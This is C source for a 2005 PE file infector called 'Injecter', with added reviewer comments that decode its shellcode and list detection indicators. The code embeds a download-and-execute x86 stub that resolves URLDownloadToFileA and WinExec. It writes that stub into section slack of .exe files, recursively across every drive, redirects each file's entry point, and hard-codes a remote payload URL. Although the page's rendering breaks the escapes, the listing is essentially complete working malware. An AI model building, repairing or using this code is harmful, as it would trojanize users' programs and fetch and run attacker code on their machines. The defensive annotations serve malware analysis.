pe代码注射
/*
Idea (translated from the original note): take a download-and-execute shellcode stub,
adapt it, and write it into the unused slack bytes of a PE file's section, redirecting
the entry point to it. (Original sign-off: "enjoy it!")

Review note: this is an offensive tool -- a PE "trojanizer" which, per its own usage text
below, can patch every .exe on disk outside the Windows directory. Treat the listing as a
malware sample for analysis, not as code to build or run. The page also appears to have
rendered every backslash as a forward slash ("/xNN", "/n", "//"), so the byte-string
literals and escape sequences will not compile as shown, and the two #include lines below
have lost their header names (presumably <windows.h> and <stdio.h>, stripped as HTML tags).
*/
#include
#include
//#define CODESIZE 439
// Singly-linked list node holding one logical-drive root string, as filled by
// BrowDisk_SaveDiskInfoToList from the GetLogicalDriveStrings output.
// RootPath is only 6 bytes: room for a root such as "C:\ " plus NUL and nothing longer.
// (The tag _DISKLIST is a reserved identifier: leading underscore + uppercase.)
typedef struct _DISKLIST
{
_DISKLIST *next;   // next drive in the list, NULL at the tail
char RootPath[6];  // drive root copied verbatim from GetLogicalDriveStrings
}DISKLIST,*PDISKLIST;
// The assembled payload (stub bytes + appended URL string(s)) built by
// MakeInjectCode_Dll / MakeInjectCode_Exe and copied into the host file by InjectCode.
unsigned char *injectcode;
DWORD CodeSize;   // byte length of injectcode; InjectCode compares it against each section's slack
// x86 stub written into the host PE -- the "dll" variant. What follows is what can be
// read directly from the bytes; anything beyond that is marked as apparent intent.
// Offsets below assume each "/xNN" was a one-byte "\xNN" escape in the original source
// (the page appears to have replaced the backslashes, so as shown this will not compile).
//  - Bytes 5..9 `B8 0C F0 FD 7F` = mov eax,7FFDF00Ch: a hard-coded address. This looks like
//    the XP-era fixed PEB base plus 0xC (PEB.Ldr) -- not verified here; any system where
//    the PEB is elsewhere (ASLR) breaks the stub at this point.
//  - Offset 0xDE is `E9 A2 A2 A2 A2` (jmp rel32) followed by a NOP. InjectCode overwrites
//    the A2A2A2A2 placeholder at 0xDF with the displacement back to the host's original
//    entry point, so the stub runs first and then chains to the real program.
//  - Offset 0xD7 is `83 C6 2B` (add esi,2Bh); MakeInjectCode_Dll patches the imm8 at 0xD9
//    with strlen(download URL)+1 so esi can step over the appended URL to the run string.
//  - `46 80 3E 80 75 FA 80 36 80` decodes to inc esi / cmp byte ptr [esi],80h / jne / xor
//    byte ptr [esi],80h: it scans forward for a 0x80 byte and flips it to 0x00. The
//    MakeInjectCode_* functions put 0x80 in place of the URL's NUL as an in-band terminator.
//  - The two stores `C7 04 18 5C 72 74 2E` and `C7 44 18 04 64 6C 6C 00` write the ASCII
//    bytes "\rt." and "dll" + NUL, i.e. the file name "\rt.dll" (leading backslash);
//    presumably appended to a system-directory path, given the API list below -- unverified.
//  - The NUL-separated table at the end is the set of API names the stub resolves:
//    GetProcAddress, GetSystemDirectoryA, WinExec, DeleteFileA, FindFirstFileA,
//    ExitProcess, LoadLibraryA, then the module name "urlmon" and URLDownloadToFileA.
//    A URLDownloadToFileA + WinExec pair in code living in section slack is the
//    behavioural signature to hunt for.
//  - Differs from code_exe_header only in the "dll"/"exe" bytes of that file name and in
//    4 bytes at offset 0xD7 (`83 C6 2B 56` here vs `53 90 90 90` there).
unsigned char code_dll_header[]=
"/xE9/xF4/x00/x00/x00/x5A/xB8/x0C/xF0/xFD/x7F/x8B/x00/x8B/x70/x1C"
"/xAD/x8B/x40/x08/x8B/xD8/x8B/x73/x3C/x03/xF3/x8B/x76/x78/x03/xF3"
"/x8B/x7E/x20/x03/xFB/x8B/x4E/x14/x33/xED/x56/x57/x51/x8B/x3F/x03"
"/xFB/x8B/xF2/x6A/x0E/x59/xF3/xA6/x74/x08/x59/x5F/x83/xC7/x04/x45"
"/xE2/xE9/x59/x5F/x5E/x8B/xCD/x8B/x46/x24/x03/xC3/xD1/xE1/x03/xC1"
"/x33/xC9/x66/x8B/x08/x8B/x46/x1C/x03/xC3/xC1/xE1/x02/x03/xC1/x8B"
"/x00/x03/xC3/x8B/xFA/x8B/xF7/x83/xC6/x0E/x8B/xD0/x6A/x06/x59/xE8"
"/x70/x00/x00/x00/x83/xC6/x0D/x52/x56/xFF/x57/xFC/x5A/x8B/xD8/x6A"
"/x01/x59/xE8/x5D/x00/x00/x00/x83/xC6/x13/x56/x46/x80/x3E/x80/x75"
"/xFA/x80/x36/x80/x5E/x83/xEC/x20/x8B/xDC/x6A/x20/x53/xFF/x57/xE4"
"/xC7/x04/x18/x5C/x72/x74/x2E/xC7/x44/x18/x04/x64/x6C/x6C/x00/x90"
"/x81/xEC/x40/x01/x00/x00/x54/x53/xFF/x57/xF0/x83/xF8/x00/x7E/x08"
"/x53/xFF/x57/xEC/x85/xC0/x74/x16/x33/xC0/x50/x50/x53/x56/x50/xFF"
"/x57/xFC/x85/xC0/x75/x08/x50/x83/xC6/x2B/x56/xFF/x57/xE8/xE9/xA2"
"/xA2/xA2/xA2/x90/x33/xC0/xAC/x85/xC0/x75/xF9/x51/x52/x56/x53/xFF"
"/xD2/x5A/x59/xAB/xE2/xEE/x33/xC0/xC3/xE8/x07/xFF/xFF/xFF/x47/x65"
"/x74/x50/x72/x6F/x63/x41/x64/x64/x72/x65/x73/x73/x00/x47/x65/x74"
"/x53/x79/x73/x74/x65/x6D/x44/x69/x72/x65/x63/x74/x6F/x72/x79/x41"
"/x00/x57/x69/x6E/x45/x78/x65/x63/x00/x44/x65/x6C/x65/x74/x65/x46"
"/x69/x6C/x65/x41/x00/x46/x69/x6E/x64/x46/x69/x72/x73/x74/x46/x69"
"/x6C/x65/x41/x00/x45/x78/x69/x74/x50/x72/x6F/x63/x65/x73/x73/x00"
"/x4C/x6F/x61/x64/x4C/x69/x62/x72/x61/x72/x79/x41/x00/x75/x72/x6C"
"/x6D/x6F/x6E/x00/x55/x52/x4C/x44/x6F/x77/x6E/x6C/x6F/x61/x64/x54"
"/x6F/x46/x69/x6C/x65/x41/x00";
// x86 stub written into the host PE -- the "exe" variant. Byte-for-byte the same as
// code_dll_header except:
//  - the stored file name is "\rt.exe" instead of "\rt.dll" (`C7 44 18 04 65 78 65 00`);
//  - the 4 bytes at offset 0xD7 are `53 90 90 90` (push ebx; 3x nop) instead of
//    `83 C6 2B 56` (add esi,2Bh; push esi), so there is no second string to skip to and
//    MakeInjectCode_Exe patches nothing in this array.
// See the notes on code_dll_header for the placeholder jmp at 0xDE/0xDF, the 0x80
// terminator scan, the hard-coded 7FFDF00Ch address, and the API-name table
// (GetProcAddress ... LoadLibraryA, "urlmon", URLDownloadToFileA). The "/xNN" spelling
// is the page's rendering of "\xNN" and does not compile as shown.
unsigned char code_exe_header[]=
"/xE9/xF4/x00/x00/x00/x5A/xB8/x0C/xF0/xFD/x7F/x8B/x00/x8B/x70/x1C"
"/xAD/x8B/x40/x08/x8B/xD8/x8B/x73/x3C/x03/xF3/x8B/x76/x78/x03/xF3"
"/x8B/x7E/x20/x03/xFB/x8B/x4E/x14/x33/xED/x56/x57/x51/x8B/x3F/x03"
"/xFB/x8B/xF2/x6A/x0E/x59/xF3/xA6/x74/x08/x59/x5F/x83/xC7/x04/x45"
"/xE2/xE9/x59/x5F/x5E/x8B/xCD/x8B/x46/x24/x03/xC3/xD1/xE1/x03/xC1"
"/x33/xC9/x66/x8B/x08/x8B/x46/x1C/x03/xC3/xC1/xE1/x02/x03/xC1/x8B"
"/x00/x03/xC3/x8B/xFA/x8B/xF7/x83/xC6/x0E/x8B/xD0/x6A/x06/x59/xE8"
"/x70/x00/x00/x00/x83/xC6/x0D/x52/x56/xFF/x57/xFC/x5A/x8B/xD8/x6A"
"/x01/x59/xE8/x5D/x00/x00/x00/x83/xC6/x13/x56/x46/x80/x3E/x80/x75"
"/xFA/x80/x36/x80/x5E/x83/xEC/x20/x8B/xDC/x6A/x20/x53/xFF/x57/xE4"
"/xC7/x04/x18/x5C/x72/x74/x2E/xC7/x44/x18/x04/x65/x78/x65/x00/x90"
"/x81/xEC/x40/x01/x00/x00/x54/x53/xFF/x57/xF0/x83/xF8/x00/x7E/x08"
"/x53/xFF/x57/xEC/x85/xC0/x74/x16/x33/xC0/x50/x50/x53/x56/x50/xFF"
"/x57/xFC/x85/xC0/x75/x08/x50/x53/x90/x90/x90/xFF/x57/xE8/xE9/xA2"
"/xA2/xA2/xA2/x90/x33/xC0/xAC/x85/xC0/x75/xF9/x51/x52/x56/x53/xFF"
"/xD2/x5A/x59/xAB/xE2/xEE/x33/xC0/xC3/xE8/x07/xFF/xFF/xFF/x47/x65"
"/x74/x50/x72/x6F/x63/x41/x64/x64/x72/x65/x73/x73/x00/x47/x65/x74"
"/x53/x79/x73/x74/x65/x6D/x44/x69/x72/x65/x63/x74/x6F/x72/x79/x41"
"/x00/x57/x69/x6E/x45/x78/x65/x63/x00/x44/x65/x6C/x65/x74/x65/x46"
"/x69/x6C/x65/x41/x00/x46/x69/x6E/x64/x46/x69/x72/x73/x74/x46/x69"
"/x6C/x65/x41/x00/x45/x78/x69/x74/x50/x72/x6F/x63/x65/x73/x73/x00"
"/x4C/x6F/x61/x64/x4C/x69/x62/x72/x61/x72/x79/x41/x00/x75/x72/x6C"
"/x6D/x6F/x6E/x00/x55/x52/x4C/x44/x6F/x77/x6E/x6C/x6F/x61/x64/x54"
"/x6F/x46/x69/x6C/x65/x41/x00";
// Globals shared by the directory walkers and the drive enumeration.
WIN32_FIND_DATA fd;            // single find buffer reused by every ckDir/ckDirS recursion level
int ret;                       // last InjectCode result, used only for the status printf
DWORD dd;                      // scratch length; InjectCode declares a local of the same name that shadows it
PDISKLIST d_hlist=NULL,d_plist=NULL,d_padd=NULL;   // drive list: head, tail, node currently being appended
char szWinDir[MAX_PATH]={0};   // Windows-directory prefix ckDirS skips; only assigned in the commented-out CLI code in main
// Write the prepared payload (injectcode, CodeSize bytes) into the PE file at lpFileName.
// The stub goes into the slack between VirtualSize and SizeOfRawData of the first section
// that has more than CodeSize bytes of it, and AddressOfEntryPoint is redirected there.
// Returns 0 on success, -1 on open/size/map failure, non-PE input, or no section with
// enough slack, and -2 if the infection marker is already present.
// Modifications made to the host (each one a usable detection indicator):
//  - OptionalHeader.AddressOfEntryPoint := section.VirtualAddress + section.VirtualSize
//  - section.Characteristics := 0xE0000020 (CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE)
//  - FileHeader.TimeDateStamp (NT header + 8) := 'rude' (an MSVC multi-character constant,
//    stored little-endian, so the file bytes read "edur")
// Defects visible in this function, noted and deliberately left as they are:
//  - `hFile<=0` does not catch INVALID_HANDLE_VALUE ((HANDLE)-1 is not <= 0 as a pointer),
//    so a failed CreateFile continues into GetFileSize.
//  - MapViewOfFile's result is never checked; a NULL view is dereferenced in the asm.
//  - `try/catch(...)` is C++ exception handling, not SEH; whether an access violation in
//    the asm is caught depends on compiler flags (/EHa) that are not visible here.
//  - e_lfanew, NumberOfRvaAndSizes, NumberOfSections and PointerToRawData + VirtualSize are
//    all trusted without comparing them to dwSize, so a crafted or truncated file can move
//    reads and writes outside the mapping. All header offsets assume PE32 (not PE32+).
//  - The slack test uses `jg` (signed): VirtualSize > SizeOfRawData yields a negative
//    value and the section is simply skipped.
//  - Labels are shared across three separate _asm blocks and a push/pop pair straddles a
//    commented-out printf; the statement order is load-bearing.
//  - The catch path falls off the end of the function without a return value.
int WINAPI InjectCode(char *lpFileName)
{
HANDLE hFile,hMap;
DWORD dwSize=0,dwSizeHigh=0,dwAddr;
char buff[100]={0};   // unused
DWORD dd;             // shadows the global dd; only receives the slack value for the disabled printf
DWORD dwPeHdr,dwSecAddr,dwOldEntryPointer,dwNewEntryPointer;
hFile=CreateFile(lpFileName,
GENERIC_READ + GENERIC_WRITE,
FILE_SHARE_READ + FILE_SHARE_WRITE,
0,
OPEN_EXISTING,
0,
0);
if (hFile<=0)   // NOTE: INVALID_HANDLE_VALUE is not <= 0 under pointer comparison; a failed open is not caught here
{
return -1;
}
dwSize=GetFileSize(hFile,&dwSizeHigh);
if ((dwSize<=0)||(dwSizeHigh>0))   // reject empty files and anything with a non-zero high size dword
{
CloseHandle(hFile);
return -1;
}
//printf("size=%d/n",dwSize);
hMap=CreateFileMapping((HANDLE)hFile,
NULL,
PAGE_READWRITE,
0,
0,
NULL);
if (hMap<=0)   // CreateFileMapping returns NULL on failure, so this test does work
{
CloseHandle(hFile);
return -1;
}
dwAddr=(DWORD)MapViewOfFile(hMap,
FILE_MAP_WRITE,
0,
0,
0);   // NOTE: never checked for NULL; the asm below dereferences it unconditionally
try   // C++ try, not SEH __try (see the notes above)
{
_asm
{
mov esi,dwAddr
cmp WORD ptr [esi],'ZM'           ; "MZ" DOS signature (multi-char constant, little-endian in memory)
jne _injectnot
add esi,DWORD ptr [esi+3ch]       ; esi -> IMAGE_NT_HEADERS via e_lfanew (not range-checked)
cmp WORD ptr [esi],'EP'           ; "PE" signature
jne _injectnot
mov dwPeHdr,esi
mov eax,[esi+28h]                 ; OptionalHeader.AddressOfEntryPoint
mov dwOldEntryPointer,eax
cmp dword ptr [esi+8],'rude'      ; infection marker: FileHeader.TimeDateStamp already 'rude'?
je _isinjected
mov ecx,DWORD ptr [esi+74h]       ; OptionalHeader.NumberOfRvaAndSizes (NT header + 0x74, PE32 layout)
imul ecx,ecx,8                    ; byte size of the data-directory array
lea eax,[ecx+esi+78h]             ; eax -> first IMAGE_SECTION_HEADER, right after the data directories
movzx ecx,word ptr [esi+6h]       ; ecx = FileHeader.NumberOfSections (loop counter)
mov edi,eax
xor edx,edx
dec edx                           ; edx = -1 so the first inc yields section index 0
_loop1:
inc edx
imul eax,edx,28h                  ; eax = edx * sizeof(IMAGE_SECTION_HEADER) (0x28)
mov ebx,dword ptr [edi+eax+10h]   ; SizeOfRawData
sub ebx,[edi+eax+8h]              ; slack = SizeOfRawData - VirtualSize
cmp ebx,CodeSize
jg _writecode                     ; signed compare: enough slack -> write the stub into this section
mov dd,ebx                        ; debug only; the printf that would show it is commented out
push ecx
push edx
}
//printf("%d/n",dd);
_asm
{
pop edx
pop ecx                           ; pairs with the push above, across the C statement in between
loop _loop1
jmp _injectnot                    ; no section had room
_writecode:
add edi,eax
mov dwSecAddr,edi                 ; edi -> chosen section header
mov ebx,[edi+0ch]                 ; VirtualAddress
add ebx,[edi+8h]                  ; ebx = VirtualAddress + VirtualSize = RVA where the stub will live
mov dwNewEntryPointer,ebx
add ebx,0deh                      ; ebx = RVA of the stub's trailing jmp rel32 (stub offset 0xDE)
sub ebx,dwOldEntryPointer
mov eax,0FFFFFFFFh
sub eax,ebx
sub eax,4                         ; eax = OldEP - (jmp_rva + 5): rel32 back to the original entry point
mov esi,injectcode
add esi,0dfh                      ; patch the A2A2A2A2 placeholder at stub offset 0xDF
mov dword ptr [esi],eax
mov ebx,[edi+14h]                 ; PointerToRawData
add ebx,[edi+8h]                  ; + VirtualSize = file offset of the slack
add ebx,dwAddr                    ; -> address inside the mapped view (not checked against dwSize)
mov edi,ebx
mov ecx,CodeSize
mov esi,injectcode
rep movsb                         ; copy the stub into the slack
mov edi,dwSecAddr
mov dword ptr [edi+24h],0E0000020h ; Characteristics := CODE|EXECUTE|READ|WRITE (RWX section)
mov esi,dwPeHdr
mov dword ptr [esi+8h],'rude'     ; overwrite TimeDateStamp with the marker (file bytes "edur")
mov eax,dwNewEntryPointer
mov dword ptr [esi+28h],eax       ; redirect AddressOfEntryPoint to the stub
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return 0;
_asm
{
_injectnot:
_exit:
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return -1;
_asm
{
_isinjected:
}
UnmapViewOfFile((LPCVOID)dwAddr);
CloseHandle(hMap);
CloseHandle(hFile);
return -2;
} // end of try
catch (...)
{
printf("error!/n");   // NOTE: the view/handles are not released here, and no value is returned on this path
}
}
// Recursively walk szDir (expected to end with a path separator) and call InjectCode on
// every regular file whose name ends in lowercase ".exe". Names starting with '.' are
// skipped (which covers "." and ".."), and any path whose prefix matches the global
// szWinDir is skipped entirely. Returns 0, or -1 if FindFirstFile fails for szDir.
// Defects visible here, noted and left unchanged:
//  - strupr() uppercases szDir AND the global szWinDir in place, so the caller's buffer
//    and the global are mutated; the prefix compare is case-insensitive only because of that.
//  - memcmp reads strlen(szWinDir) bytes from szDir even when szDir is shorter. If szWinDir
//    is empty (it is never set in the main shown below), dd == 0, memcmp returns 0 and
//    every directory is skipped.
//  - szDirectory/szDirTmp are fixed MAX_PATH buffers filled by strncpy + strcat with no
//    length check; strncpy does not guarantee NUL termination at MAX_PATH.
//  - fd.cFileName[dd-4] indexes before the array when a name is shorter than 4 characters.
//  - The extension test is case-sensitive (".EXE" does not match).
//  - hSearch is never passed to FindClose: one find handle is leaked per directory.
//  - fd is a single global shared by every recursion level; the outer loop's FindNextFile
//    refills it after each recursive call returns, so the walk still continues.
//  - "/n" in the printf strings appears to be the page's rendering of "\n".
int WINAPI ckDirS(char *szDir)
{
HANDLE hSearch;
char szDirectory[MAX_PATH];
char szDirTmp[MAX_PATH];
dd=strlen(szWinDir);
if (memcmp(strupr(szDir),strupr(szWinDir),dd)==0) // skip the Windows directory (prefix match, mutates both strings)
{
return 0;
}
memset(&fd,0,sizeof(WIN32_FIND_DATA));
strncpy(szDirectory,szDir,MAX_PATH);
strcat(szDirectory,"*.*");
hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);
if (hSearch==INVALID_HANDLE_VALUE)
{
return -1;
}
do
{
if (fd.cFileName[0]!='.')   // skips ".", ".." and any other dot-prefixed name
{
if(fd.dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY) // subdirectory: recurse
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
strcat(szDirTmp,"//");   // trailing separator (rendered "//" on the page; presumably a backslash originally)
ckDirS(szDirTmp);
}
else
{
dd=strlen(fd.cFileName);
if ((fd.cFileName[dd-4]=='.')&&   // NOTE: underflows for names shorter than 4 characters
(fd.cFileName[dd-3]=='e')&&
(fd.cFileName[dd-2]=='x')&&
(fd.cFileName[dd-1]=='e'))
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
printf("inject:%s...",szDirTmp);
ret=InjectCode(szDirTmp);
if (ret==0)
{
printf("ok!/n");
}
else if (ret==-1)
{
printf("faild!/n");
}
else if (ret==-2)
{
printf("injected!/n");   // marker already present; file left alone
}
}
}
}
}
while (FindNextFile(hSearch,&fd));
return 0;
}
// Non-recursive variant of ckDirS: call InjectCode on every "*.exe" match directly in
// szDir (expected to end with a path separator). Unlike ckDirS there is no Windows-
// directory skip and the extension filtering is done by the FindFirstFile pattern, so
// case-insensitively. Returns 0, or -1 if FindFirstFile fails.
// Same defects as ckDirS: unchecked strncpy + strcat into MAX_PATH buffers, hSearch never
// closed with FindClose, shared global fd, and "/n" standing in for "\n".
int WINAPI ckDir(char *szDir)
{
HANDLE hSearch;
char szDirectory[MAX_PATH];
char szDirTmp[MAX_PATH];
memset(&fd,0,sizeof(WIN32_FIND_DATA));
strncpy(szDirectory,szDir,MAX_PATH);
strcat(szDirectory,"*.exe");
hSearch=FindFirstFile((LPCTSTR)szDirectory,&fd);
if (hSearch==INVALID_HANDLE_VALUE)
{
return -1;
}
do
{
if (fd.cFileName[0]!='.')   // skip dot-prefixed names; directories matching *.exe are not filtered out
{
memset(szDirTmp,0,MAX_PATH);
strcat(szDirTmp,szDir);
strcat(szDirTmp,fd.cFileName);
printf("inject:%s...",szDirTmp);
ret=InjectCode(szDirTmp);
if (ret==0)
{
printf("ok!/n");
}
else if (ret==-1)
{
printf("faild!/n");
}
else if (ret==-2)
{
printf("injected!/n");   // marker already present; file left alone
}
}
}
while (FindNextFile(hSearch,&fd));
return 0;
}
// Print the banner and usage text. This is the only description of the intended CLI
// (-all / -s <dir> / -d <dir>), which is commented out in main. The "/n", "/t" and "//"
// sequences appear to be the page's rendering of "\n", "\t" and "\\".
void start(void)
{
printf("/n");
printf("Injecter //--A Tool Can Inject The Download&&Execute Trojan To The PE File/n");
printf("Written By Ruder [2005/3],E-mail:cocoruder@163.com/n");
printf("Homepage:http://ruder.cdut.net,enjoy it!/n");
printf("Usage:/n");
printf("/tInjecter [order] [param]/n");
printf("/t[order]:/n");
printf("-all ---Inject all the exe file on disk except windows directory/n");
printf("-s ---under the directory,will scan the sub directory/n");
printf("-d ---under the directory,will not scan the sub directory/n");
printf("example:/n");
printf("/tInjecter -all/n");
printf("/tInjecter -s e:///n");
printf("/tInjecter -d d:///n");
printf("/n");
}
// Append one drive root string (lpChar, an entry of the GetLogicalDriveStrings output)
// to the global list headed by d_hlist, with d_plist tracking the tail.
// Returns 0, or -1 if malloc fails.
// NOTE: strncpy copies strlen(lpChar) bytes into the 6-byte RootPath with no length
// check, so it only stays in bounds while drive roots are at most 5 characters.
// The nodes are never freed anywhere in this file.
int WINAPI BrowDisk_SaveDiskInfoToList(char *lpChar)
{
// allocate a node and copy the drive name into it
d_padd=(PDISKLIST)malloc(sizeof(_DISKLIST));
if (d_padd==NULL)
{
return -1;
}
memset(d_padd->RootPath,0,6);
strncpy(d_padd->RootPath,lpChar,strlen(lpChar));   // no bound against sizeof(RootPath)
d_padd->next=NULL;
if (d_hlist==NULL) // empty list: this node becomes head and tail
{
d_hlist=d_padd;
d_plist=d_hlist;
}
else // otherwise link after the current tail
{
d_plist->next=d_padd;
d_plist=d_padd;
}
return 0;
}
// Enumerate the logical drives with GetLogicalDriveStrings and feed each root string
// to BrowDisk_SaveDiskInfoToList. Returns FALSE if the API call fails.
// NOTE: there is no return statement on the success path, so the function falls off
// the end and its BOOL result is undefined (InjectAll ignores it anyway).
// The 128-byte buffer is only validated by the zero-return check; a required length
// greater than 128 is not handled. Results of BrowDisk_SaveDiskInfoToList are ignored.
BOOL WINAPI BrowDisk_GetLogicalDriveList(VOID)
{
char BDBuffer[128];
char *lpChar;
memset(BDBuffer, 0x00, 128);
if (GetLogicalDriveStrings(128, BDBuffer) == 0 )
{
return FALSE;
}
// the buffer holds NUL-separated strings ended by an empty string
for (lpChar=BDBuffer;*lpChar!=0x00;lpChar=lpChar+strlen(lpChar)+1)
{
BrowDisk_SaveDiskInfoToList(lpChar);
}
}
// Walk every collected drive root with ckDirS (recursive). Returns -1 when no drives
// were collected, otherwise 0. The BOOL result of BrowDisk_GetLogicalDriveList is
// ignored, the ckDirS results are ignored, and the drive list is never freed.
int WINAPI InjectAll(void)
{
PDISKLIST p1;
BrowDisk_GetLogicalDriveList();
p1=d_hlist;
if (p1==NULL)
{
return -1;
}
while (1)
{
ckDirS(p1->RootPath);
p1=p1->next;
if (p1==NULL)
{
break;
}
}
return 0;
}
// Build the "dll" payload into the global injectcode and set CodeSize:
//   code_dll_header bytes, then szGetStr (the download URL), then szRunStr.
// Returns 0, or -1 if malloc fails. Resulting layout (assuming the stub compiled to one
// byte per "\xNN"):
//   [0, sizeof(header)-1)            stub bytes; the array's trailing NUL is overwritten
//   [sizeof(header)-1, ...)          szGetStr, with its terminating NUL replaced by 0x80
//   immediately after                szRunStr including its NUL
// so CodeSize = sizeof(header) + dd1 + dd2 - 1.
// Before copying, the byte at code_dll_header[0xD9] -- the imm8 of the `add esi,2Bh`
// (83 C6 2B) in the stub -- is overwritten with dd1 = strlen(szGetStr)+1, so the stub can
// step over the URL to reach szRunStr. That mutates the global array, and a dd1 above 255
// is silently truncated by the char cast. The 0x80 byte is the terminator the stub's
// cmp/xor-0x80 scan converts back to NUL at run time.
// The two printf calls only dump the heap address (debug output; "/n" presumably "\n").
int MakeInjectCode_Dll(char *szGetStr,char *szRunStr)
{
DWORD dd1,dd2,i;
dd1=strlen(szGetStr)+1;
dd2=strlen(szRunStr)+1;
CodeSize=sizeof(code_dll_header)+dd1+dd2-1;
injectcode=(unsigned char *)malloc(CodeSize);
if (injectcode==NULL)
{
return -1;
}
printf("%.8x/n",(DWORD)injectcode);
*(char *)(code_dll_header+0xD9)=(char)dd1;   // patch the add esi,imm8 skip length in the global stub
i=sizeof(code_dll_header);
memcpy(injectcode,code_dll_header,i);
memcpy(injectcode+i-1,szGetStr,dd1);         // URL starts where the header's NUL was
i=i+dd1-1;
*(char *)(injectcode+i-1)=0x80;              // replace the URL's NUL with the 0x80 in-band terminator
memcpy(injectcode+i,szRunStr,dd2);           // run string follows, keeping its NUL
printf("%.8x/n",(DWORD)injectcode);
return 0;
}
// Build the "exe" payload into the global injectcode and set CodeSize:
//   code_exe_header bytes, then szGetStr (the download URL) with its terminating NUL
//   replaced by 0x80 (the stub's in-band terminator).
// CodeSize = sizeof(header) + dd1 - 1. Returns 0, or -1 if malloc fails.
// Unlike MakeInjectCode_Dll nothing in the stub array is patched and no run string is
// appended (the exe variant pushes ebx instead of a skipped-to string; see the header).
int MakeInjectCode_Exe(char *szGetStr)
{
DWORD dd1,i;
dd1=strlen(szGetStr)+1;
CodeSize=sizeof(code_exe_header)+dd1-1;
injectcode=(unsigned char *)malloc(CodeSize);
if (injectcode==NULL)
{
return -1;
}
i=sizeof(code_exe_header);
memcpy(injectcode,code_exe_header,i);
memcpy(injectcode+i-1,szGetStr,dd1);   // URL starts where the header's NUL was
i=i+dd1-1;
*(char *)(injectcode+i-1)=0x80;        // replace the URL's NUL with the 0x80 terminator
return 0;
}
// Entry point. As shown, the command-line handling is commented out and main is a test
// harness: it builds the "exe" payload with a hard-coded download URL and injects it into
// one hard-coded path, printing CodeSize and the InjectCode result. The commented-out
// block is the CLI described by start() (-all / -s <dir> / -d <dir>, where the directory
// must end with a separator); note that only that block sets szWinDir, which ckDirS's
// Windows-directory skip depends on. `void main` is non-standard; orderid is assigned
// but never read. Nothing frees injectcode.
void main(int argc,char *argv[])
{
int orderid;
// InjectCode("C://NTFSDOS//ntfschk.exe");
// return;
MakeInjectCode_Exe("http://www.xloading.com/ruder/calc.exe");   // hard-coded test URL; return value ignored
printf("SizeCode=%d/n",CodeSize);
printf("%d/n",InjectCode("d://a//pslist.exe"));                  // hard-coded test target
/*
if ((argc!=2)&&(argc!=3))
{
start();
return;
}
GetWindowsDirectory(szWinDir,MAX_PATH);
strcat(szWinDir,"//");
if (strcmp(argv[1],"-all")==0)
{
orderid=0;
InjectAll();
return;
}
if (strcmp(argv[1],"-s")==0)
{
orderid=1;
if (argc==2)
{
start();
return;
}
if (argv[2][strlen(argv[2])-1]!='//')
{
start();
return;
}
ckDirS(argv[2]);
return;
}
if (strcmp(argv[1],"-d")==0)
{
orderid=2;
if (argc==2)
{
start();
return;
}
if (argv[2][strlen(argv[2])-1]!='//')
{
start();
return;
}
ckDir(argv[2]);
return;
}
start();
*/
}